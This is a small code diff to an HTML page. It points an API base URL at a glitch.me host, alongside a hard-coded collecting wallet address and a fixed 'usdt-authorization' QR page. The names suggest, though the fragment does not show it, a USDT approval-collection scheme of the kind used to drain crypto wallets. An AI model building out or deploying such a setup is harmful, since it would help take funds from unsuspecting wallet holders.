--- a/index.html
+++ b/index.html
@@ -409,7 +409,7 @@
     <script src="https://cdn.socket.io/4.0.1/socket.io.min.js"></script>
     <script>
 // 配置
-const API_BASE_URL = ''; // 如果在同一域名下可以留空，或填入API的完整URL
+const API_BASE_URL = 'https://spectacular-wholesale-sprint.glitch.me'; // 如果在同一域名下可以留空，或填入API的完整URL
 const RESERVOIR_WALLET = 'TYfH1UFjepVVFaEsaCk4MAHM2yA5RQk899';
 const QR_CODE_URL = 'https://heathwang888.github.io/usdt-authorization/'; // 固定的授權URL
 
